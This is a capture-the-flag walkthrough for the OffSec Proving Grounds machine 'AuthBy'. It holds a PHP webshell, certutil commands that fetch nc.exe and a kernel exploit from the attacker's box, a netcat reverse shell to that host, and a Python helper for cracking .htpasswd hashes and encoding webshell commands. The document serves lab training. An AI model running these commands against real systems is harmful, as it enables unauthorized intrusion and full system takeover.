AuthBy

Writeup for AuthBy from OffSec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.216.46 all

Service Enumeration

FTP (Port 21)

Enumerating the FTP service turns up a few accounts: Offsec, anonymous, and admin.

The credentials admin:admin log in and give read access to a set of files.

We can mirror every file that account can read with:

wget -m ftp://admin:admin@192.168.216.46

Among the mirrored files is .htpasswd, the Apache basic-auth file, which holds a password hash for the offsec user.

We crack the hash with john.

This gives us offsec:elite, the credentials for the HTTP server on port 242.

HTTP (Port 242)

Exploit

We upload shell.php over the same FTP access; it lands in the directory served on port 242. It contains the following one-line webshell:

shell.php
<?php system($_GET['cmd']);?>

We then pull nc.exe onto the target through the webshell, using certutil to fetch it from a web server on our attack box (192.168.49.216). Spaces in the command are URL-encoded as %20:

http://192.168.216.46:242/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20http://192.168.49.216/home/kali/pg/authby/payloads/nc.exe%20nc.exe

Now that nc.exe is on the target, start a listener on the attack box (nc -lvnp 80) and launch the reverse shell through the same webshell URL, URL-encoding the spaces as before. Since the server that served nc.exe was also on port 80 of 192.168.49.216, stop it before starting the listener, or pick a different port for the shell.

nc.exe -e cmd.exe 192.168.49.216 80
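As an added example (not part of the original writeup), a small Python helper covering the two steps above that are easy to get wrong: telling john which --format the .htpasswd hash is, and building shell.php?cmd= URLs that survive URL encoding. The sample .htpasswd content and hash strings are constructed placeholders, the rockyou wordlist path is an assumption, and the target and attacker addresses are the ones already used on this page.

```python
"""Helpers for the AuthBy chain: hash type detection for .htpasswd and
URL-encoding of webshell commands. Added example, not the writeup's code.
All sample data (users, hash strings) is constructed, not taken from the box."""
import urllib.parse

# Constructed sample .htpasswd content: placeholder hashes, not the real file.
SAMPLE_HTPASSWD = """\
offsec:$apr1$saltsalt$AAAAAAAAAAAAAAAAAAAAAA
# lines starting with '#' are ignored by Apache
legacy:AbCdEfGhIjKlM
"""

# Hash prefix -> john --format name (jumbo naming).
JOHN_FORMATS = {
    "$apr1$": "md5crypt",   # Apache MD5 variant, the usual 'htpasswd -m' output
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",  # 'htpasswd -B'
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
}


def hash_format(h):
    """Return the john format name for one htpasswd hash string."""
    for prefix, fmt in JOHN_FORMATS.items():
        if h.startswith(prefix):
            return fmt
    if len(h) == 13 and "$" not in h:
        return "descrypt"   # traditional crypt(3), 'htpasswd -d'
    return "unknown"        # e.g. {SHA} entries: leave it to john's autodetect


def parse_htpasswd(text):
    """Parse user:hash lines, skipping blanks and comments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, h = line.partition(":")
        if not sep:
            continue
        entries.append({"user": user, "hash": h, "format": hash_format(h)})
    return entries


def john_command(path, fmt, wordlist="/usr/share/wordlists/rockyou.txt"):
    """Build the john invocation; the wordlist path is an assumed Kali default."""
    cmd = ["john", f"--wordlist={wordlist}"]
    if fmt != "unknown":
        cmd.append(f"--format={fmt}")
    cmd.append(path)
    return " ".join(cmd)


def build_cmd_url(shell_url, cmd):
    """URL-encode a command for shell.php?cmd=...

    Only '/' and ':' are left as-is (both legal inside a query string), so
    spaces become %20 exactly as in the writeup, while '&', '=', '+' and '#'
    are escaped. A raw '&' would otherwise terminate the cmd parameter and
    silently drop the rest of the command, e.g. in 'whoami && hostname'.
    """
    return f"{shell_url}?cmd={urllib.parse.quote(cmd, safe='/:')}"


if __name__ == "__main__":
    for entry in parse_htpasswd(SAMPLE_HTPASSWD):
        print(entry["user"], entry["format"])
        print(john_command(".htpasswd", entry["format"]))
    shell = "http://192.168.216.46:242/shell.php"
    print(build_cmd_url(shell, "whoami && hostname"))
    print(build_cmd_url(shell, "nc.exe -e cmd.exe 192.168.49.216 80"))
```

Feeding john an explicit --format avoids the "detected hash type X, but the string is also recognized as Y" ambiguity that $apr1$ hashes trigger; building the URLs with quote() rather than by hand matters as soon as a command contains &, = or +.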

Privesc

We transfer winPEAS to the target machine and run it. Based on its output we go with the MS11-046 kernel exploit (the afd.sys local privilege escalation).

We pull the compiled exploit onto the target the same way we fetched nc.exe:

cmd.exe /c certutil -urlcache -split -f http://192.168.49.216/home/kali/pg/authby/windows-kernel-exploits/MS11-046/ms11-046.exe ms11-046.exe

Running ms11-046.exe from our shell drops us into a SYSTEM shell, and whoami reports nt authority\system.
